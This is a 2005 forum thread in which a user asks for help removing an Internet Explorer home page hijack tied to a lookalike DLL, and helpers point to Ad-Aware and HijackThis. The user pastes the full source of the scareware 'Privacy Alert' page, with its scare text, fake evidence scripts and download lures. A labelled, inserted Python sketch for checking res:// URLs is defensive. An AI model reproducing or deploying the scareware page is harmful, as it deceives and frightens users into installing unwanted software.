Romney1974
6 Jul 2005, 6:18pm
Hi all - I have got two issues I need some help with.
Firstly, my Internet Explorer home page has been hijacked with a DLL I cannot access or remove (res://C:\WINDOWS\system32\shdocsv.dll/API32.htm#ID=347;065D) - it displays an advert for spyware (Evidence Eliminator).
Secondly, my desktop has also been hijacked by another spyware system (http://www.antivirus-gold.com/?wm=&swm=), which has loaded a screen.html document into my C:\Windows.
I have tried using Hi-Jack software (as presented in these threads) but to no avail. Can anybody help?
checkmate
6 Jul 2005, 7:39pm
I think that you may be able to fix this problem by disabling the programs. I'm not sure of the names of the programs, but if you could find out where they are located on your computer, or even a general direction, I could help you from there.
Romney1974
6 Jul 2005, 8:24pm
Hi - I've managed to solve the desktop issue - but the IE one remains. Basically a file called screen.html has been installed, that is being called by a DLL located and called C:\WINDOWS\system32\shdocsv.dll/API32.htm#ID=347;065D. I can find the DLL as a read-only file through the command prompt, but it won't let me delete it from the command prompt.
This is the html source of the IE page.
<html><head><title>Privacy Alert</title>******** language='JavaScript'>var id='SVC'; function ok() {self.focus();self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight);}var c='205.';function xxx() {var x=new Array();x[0]='xxx';for (i=1; i<30; i++) {a=Math.round(Math.random()*70); document.write(x[a]+', ');}document.write(' ...');}</script>
******** language='JScript.Encode'>[JScript.Encode-encoded script body omitted]</script><style>a:link{font:8pt/11pt verdana; color:black} a:visited{font:8pt/11pt verdana; color:black} font{color:black; font:8pt/11pt verdana} font.red{color:red; font:8pt/11pt verdana} font.ee{font:15pt/18pt verdana; color:blue} font.es{font:10pt/13pt verdana; color:blue} font.el{font:8pt/11pt verdana; color:blue} a:link{text-decoration:none} a:visited{text-decoration:none} a{text-decoration:none}</style></head><body bgcolor="#FFFFFF" onselectstart="return false;" oncontextmenu="return false;" ondragstart="return false;" onload="ok();"><table width=600 cellpadding=3 cellspacing=5 border=0><tr><td valign=top align=left width="5%"><img src='res://shdoclc.dll/pagerror.gif'></td><td align=left width="95%"><font style='font: 13pt/15pt verdana; color: red'>Privacy Violation Detected</font><br></td></tr><tr><td width=600 colspan=2><font>Warning: your internet activities are being recorded...<br><br><font size=1><hr 
color='#C0C0C0' noshade><br><font class='red'>Your PC keeps records of all your online and off-line activity.</font> Any websites you view, e-mails you send, and everything else you or someone else have ever done on your computer can be found out.<br>******** language='javascript'>link("<font class='es'><u>You need special software to resolve this problem, click here now</u></font>");</script><br><ul>******** language='javascript'>env();</script><li> They know <font class='red'>you are using</font> ******** language='javascript'>document.write(navigator.appName);</script></li><br><br><li> They know <font class='red'>your system is</font> ******** language='javascript'>document.write(navigator.userAgent);</script></li><br><br>******** language='javascript'>if (navigator.userAgent.indexOf("Win")!=-1) {document.write('<li> They know your <font class=\'red\'>computer content</font>, it is on the Internet: <a href="javascript:void(0);" onClick="window.open(\'file:///C:/\',\'wn001\',\'left=0,top=0\');return false;"><font size=1 class="el"><u>click here to see your C: disk</u></font></a></li><br><br>');}</script><li> <font class='red'>These words have been found in your system records:</font><br>******** language='javascript'>xxx();</script></li><br><br><li> Your risk status for further investigation: <font class='red'>VERY HIGH RISK</font></li><br><br><li> Time of latest investigation: ******** language='javascript'>var right_now=new Date(), right_hours=right_now.getHours(), right_min=right_now.getMinutes(), right_sec=right_now.getSeconds(), ampm=' a.m.';if (right_hours > 12) right_hours = right_hours - 12;document.write(right_hours); document.write(':'); if (right_min < 10) document.write('0'); document.write(right_min); document.write(':'); if (right_sec < 10) document.write('0'); document.write(right_sec); if (right_now.getHours() > 12) ampm=' p.m.'; document.write(ampm); document.write(' on ');function makeArray() {for (i = 0; i<makeArray.arguments.length; i++)this[i 
+ 1] = makeArray.arguments[i]; }var months = new makeArray('January','February','March','April','May','June','July','August','September','October','November','December'), date = new Date(), day = date.getDate(), month = date.getMonth() + 1, yy = date.getYear(), year = (yy < 1000) ? yy + 1900 : yy;document.write(day + ' ' + months[month] + ' ' + year);</script></li></ul><font class='red'>YOUR COMPUTER IS FULL OF EVIDENCE</font><br><br>Your hard drive might appear clean, but still be full of 'sensitive material' that you did not want to download in the first place and it might very well be a serious criminal offence to have that data stored on your computer even if you didn't know it was still there.<br><br>How would you feel if a snoop made this information public to your spouse, mother & father, neighbors, children, boss, church or the media?<br><br>To avoid such problems in future, professionally clean up your records before they are available to everybody and keep your computer secure & private, we recommend you to use approved & certificated software.<br><br>******** language='javascript'>link("<font class='ee'><u>Click here to download privacy protection software</u><br>and get more information about this problem</font>");</script><br><br><br><br><br><font color="#666666">******** language='javascript'>document.write('#'+Math.round(Math.random()*1000)+'-'+Math.round(Math.random()*50000));</script> Client Investigation Report</font><br><br><br><b>Disclaimer:</b><br>The information is provided "as is" without warranty of any kind.<br>But if you don't follow our recommendations & don't use ******** language='javascript'>link("<font class='el'><u>required software</u></font>");</script>, we will disclaim all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if we have been advised of the possibility of such damages.<br><br><br><br><br></font></td></tr></table></body></html>
checkmate
6 Jul 2005, 10:15pm
Can you access your control panel?
Romney1974
6 Jul 2005, 10:25pm
Yes - like I say I have fixed the desktop issue - although I have an exe file called gdbj.exe that caused the problem left in my Temp file - and I cannot delete it.
The issue remaining is the home page for IE - I have since downloaded Firefox as a temporary solution - but obviously not perfect.
checkmate
7 Jul 2005, 12:19am
I use Firefox. Firefox is the perfect solution. Rants on...lol
Anyway...
Do you use Adaware? I think that Adaware may let you delete it.
The IE problem... is a little tougher... Do you know the name of the program that causes this problem? Do you know where it is located on your computer?
EDIT: I hope that I don't get into trouble for this...
EDIT AGAIN: I wonder why Buckeye-Sam hasn't posted here yet... :scratch:
Romney1974
7 Jul 2005, 12:16pm
Hi yes - the problem is caused by an 'invisible DLL' located in C:\Windows.
It is also calling an API called API32.htm. But I cannot locate this (I've performed a search, and found one in the Temp directory, deleted it, but the problem was still there).
I can locate the DLL through the command line, but it is read-only. I have started the computer in safe mode, but it is still in read-only mode there as well.
I'm confused!
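[Added example, not part of any post in this thread] The home page value quoted above is a res:// URL, which makes Internet Explorer load an HTML resource (here API32.htm) embedded inside the named module rather than a file on disk. The Python sketch below splits such a URL into module, resource and fragment and flags module names that closely resemble a stock IE module; the function name triage_res_url and the KNOWN_MODULES allowlist are assumptions made for this illustration.

```python
import re
from difflib import get_close_matches
from ntpath import basename  # parses Windows paths on any OS

# Assumption: a small allowlist of stock Internet Explorer modules that
# legitimately serve res:// pages. Extend it for the build being checked.
KNOWN_MODULES = ("shdoclc.dll", "shdocvw.dll", "ieframe.dll", "mshtml.dll")

# res://<module path>/<resource name>[#fragment]; the module path may hold a
# drive letter and backslashes, so match lazily up to ".dll/" or ".exe/".
RES_URL = re.compile(
    r"^res://(?P<module>.+?\.(?:dll|exe))/(?P<resource>[^#]*)(?:#(?P<fragment>.*))?$",
    re.IGNORECASE,
)

def triage_res_url(url):
    """Split a res:// URL and classify the module it loads from."""
    m = RES_URL.match(url.strip())
    if not m:
        return None  # not a res:// URL
    module = m.group("module")
    name = basename(module).lower()
    if name in KNOWN_MODULES:
        verdict, nearest = "known", name
    else:
        # A near miss on a stock module name is a stronger signal than a
        # name that resembles nothing at all.
        close = get_close_matches(name, KNOWN_MODULES, n=1, cutoff=0.8)
        verdict, nearest = ("lookalike", close[0]) if close else ("unknown", None)
    return {"module": module, "name": name, "resource": m.group("resource"),
            "fragment": m.group("fragment"), "verdict": verdict, "nearest": nearest}

# The first two URLs are quoted in this thread (the hijacked home page and an
# image reference inside the posted page source); the third is constructed.
SAMPLES = [
    r"res://C:\WINDOWS\system32\shdocsv.dll/API32.htm#ID=347;065D",
    "res://shdoclc.dll/pagerror.gif",
    r"res://C:\Temp\toolbar7.dll/page.htm",  # constructed
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage_res_url(s))
```

A "known" verdict only means the file name matches the allowlist; the file on disk still has to be checked by path and signature.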
Buckeye_Sam
8 Jul 2005, 3:05pm
We need to get a look at what's running on your computer in order to help you. Please follow the directions at this link to download a tool called HijackThis and post a log.
http://www.short-media.com/forum/showpost.php?p=172584&postcount=2